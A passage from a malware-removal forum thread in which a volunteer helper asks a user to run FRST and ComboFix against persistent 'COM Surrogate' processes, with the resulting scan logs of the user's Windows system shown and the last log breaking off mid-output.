2014-05-30 08:42 . 2014-06-11 11:33 51200 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:35 . 2014-06-11 11:33 608768 ----a-w- c:\windows\system32\ie4uinit.exe
2014-05-30 08:29 . 2014-06-11 11:33 631808 ----a-w- c:\windows\system32\msfeeds.dll
2014-05-30 08:28 . 2014-06-11 11:33 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27 . 2014-06-11 11:33 592896 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24 . 2014-06-11 11:33 1249280 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-05-30 08:23 . 2014-06-11 11:33 2040832 ----a-w- c:\windows\system32\inetcpl.cpl
2014-05-30 08:10 . 2014-06-11 11:33 32256 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56 . 2014-06-11 11:33 2266112 ----a-w- c:\windows\system32\wininet.dll
2014-05-30 07:56 . 2014-06-11 11:33 4244992 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-05-30 07:50 . 2014-06-11 11:33 1068032 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49 . 2014-06-11 11:33 1964544 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:43 . 2014-06-11 11:33 13522944 ----a-w- c:\windows\system32\ieframe.dll
2014-05-30 07:30 . 2014-06-11 11:33 1398272 ----a-w- c:\windows\system32\urlmon.dll
2014-05-30 07:21 . 2014-06-11 11:33 1790976 ----a-w- c:\windows\SysWow64\wininet.dll
2014-05-30 07:13 . 2014-06-11 11:33 846336 ----a-w- c:\windows\system32\ieapfltr.dll
2014-05-09 06:14 . 2014-05-14 13:38 477184 ----a-w- c:\windows\system32\aepdu.dll
2014-05-09 06:11 . 2014-05-14 13:38 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-05-08 09:32 . 2014-06-11 11:32 3178496 ----a-w- c:\windows\system32\rdpcorets.dll
2014-05-08 09:32 . 2014-06-11 11:32 16384 ----a-w- c:\windows\system32\RdpGroupPolicyExtension.dll
2014-04-25 02:34 . 2014-06-11 11:32 801280 ----a-w- c:\windows\system32\usp10.dll
2014-04-25 02:06 . 2014-06-11 11:32 626688 ----a-w- c:\windows\SysWow64\usp10.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"{90140000-003D-0000-1000-0000000FF1CE}"="del" [X]
.
c:\users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-19 33322312]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R0 xnvdb;xnvdb;c:\windows\System32\drivers\cixf.sys;c:\windows\SYSNATIVE\drivers\cixf.sys [x]
R1 qnmokglx;qnmokglx;c:\windows\system32\drivers\qnmokglx.sys;c:\windows\SYSNATIVE\drivers\qnmokglx.sys [x]
R1 smvowoli;smvowoli;c:\windows\system32\drivers\smvowoli.sys;c:\windows\SYSNATIVE\drivers\smvowoli.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [x]
R3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys;c:\windows\SYSNATIVE\drivers\btusbflt.sys [x]
R3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;c:\windows\system32\drivers\BVRPMPR5a64.SYS;c:\windows\SYSNATIVE\drivers\BVRPMPR5a64.SYS [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 qrkis;Tether Miniport;c:\windows\system32\DRIVERS\qrkis.sys;c:\windows\SYSNATIVE\DRIVERS\qrkis.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB13;RoxMediaDB13;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [x]
R3 SwitchBoard;Adobe SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TurboBoost;TurboBoost;c:\program files\Intel\TurboBoost\TurboBoost.exe;c:\program files\Intel\TurboBoost\TurboBoost.exe [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 Sahdad64;HDD Filter Driver;c:\windows\System32\Drivers\Sahdad64.sys;c:\windows\SYSNATIVE\Drivers\Sahdad64.sys [x]
S0 Saibad64;Volume Filter Driver;c:\windows\System32\Drivers\Saibad64.sys;c:\windows\SYSNATIVE\Drivers\Saibad64.sys [x]
S1 SaibVdAd64;Virtual Disk Driver;c:\windows\system32\Drivers\SaibVdAd64.sys;c:\windows\SYSNATIVE\Drivers\SaibVdAd64.sys [x]
S2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [x]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe;c:\windows\SYSNATIVE\BtwRSupportService.exe [x]
S2 BOT4Service;BOT4Service;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe [x]
S2 Fitbit Connect;Fitbit Connect Service;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 PCPitstop Scheduling;PCPitstop Scheduling;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe [x]
S2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe;c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [x]
S2 rimspci;rimspci;c:\windows\system32\DRIVERS\rimspe64.sys;c:\windows\SYSNATIVE\DRIVERS\rimspe64.sys [x]
S2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\risdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\risdpe64.sys [x]
S2 rixdpcie;rixdpcie;c:\windows\system32\DRIVERS\rixdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\rixdpe64.sys [x]
S2 TurboB;Turbo Boost UI Monitor driver;c:\windows\system32\DRIVERS\TurboB.sys;c:\windows\SYSNATIVE\DRIVERS\TurboB.sys [x]
S2 WMCoreService;Mobile Broadband Service;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [x]
S3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
S3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys;c:\windows\SYSNATIVE\DRIVERS\btwampfl.sys [x]
S3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys;c:\windows\SYSNATIVE\DRIVERS\CtClsFlt.sys [x]
S3 ITECIRfilter;ITECIR Filter Driver;c:\windows\system32\DRIVERS\ITECIRfilter.sys;c:\windows\SYSNATIVE\DRIVERS\ITECIRfilter.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-16 13:09 1091912 ----a-w- c:\program files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-31 23:36]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-14 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
uDefault_Search_URL = hxxp://www.google.com/ie
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
.
- - - - ORPHANS REMOVED - - - -
.
SafeBoot-51887692.sys
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
AddRemove-centurytoolbar - c:\program files (x86)\centurytoolbar\uninstall.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-303777)
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
c:\program files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
c:\program files (x86)\Canon\IJPLM\IJPLMSVC.EXE
c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
c:\program files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
c:\program files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
c:\windows\syswow64\dllhost.exe
.
**************************************************************************
.
Completion time: 2014-07-16  22:08:13 - machine was rebooted
ComboFix-quarantined-files.txt  2014-07-17 02:08
.
Pre-Run: 288,945,627,136 bytes free
Post-Run: 289,057,746,944 bytes free
.
- - End Of File - - D99C0E583B6D1821177A35704A931AA0
A36C5E4F47E84449FF07ED3517B43A31



#6 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:05 PM

Posted 17 July 2014 - 02:35 AM

Hi there,

let's do this:


Step 1

Please download this attached Attached File  fixlist.txt   252bytes   16 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Run Combofix again. But this time don't unplug the network beforehand but leave the system in the "normal" state with all those 'COM Surrogates' running so that Combofix can fully 'witness' the symptoms as you call it. :)

#7 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 17 July 2014 - 09:15 AM

Many thanks for your help on this.

 

Here're the results.  They are almost what you asked for.

 

STEP 1

Ran FRST with fixlist.txt EXACTLY as you specified. 

 

STEP 2

Then ran Combofix.exe.  However, when it finished there were no 'Surrogate' processes running.  I assumed FRST had killed them.

 

STEP 3

Renamed ComboFix log to preserve it.

I brought up taskmanager, made sure some 'Surrogates' were running and started Combofix.exe again.

The 'Surrogates' went away immediately.  I have never seen this behavior before.  Somewhere during the run the task manager went away too.

I assume ComboFix was killing these tasks.

 

So below are 3 listings:

1. FRST Log

2. ComboFix - probably started without 'Surrogates'

3. ComboFix - with 'Surrogates' running when started but not shortly thereafter.

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 15-07-2014 01
Ran by Ric at 2014-07-17 08:41:24 Run:1
Running from C:\Users\Ric\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
REG: reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s
ListPermissions: HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
*****************

========= reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s =========

HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
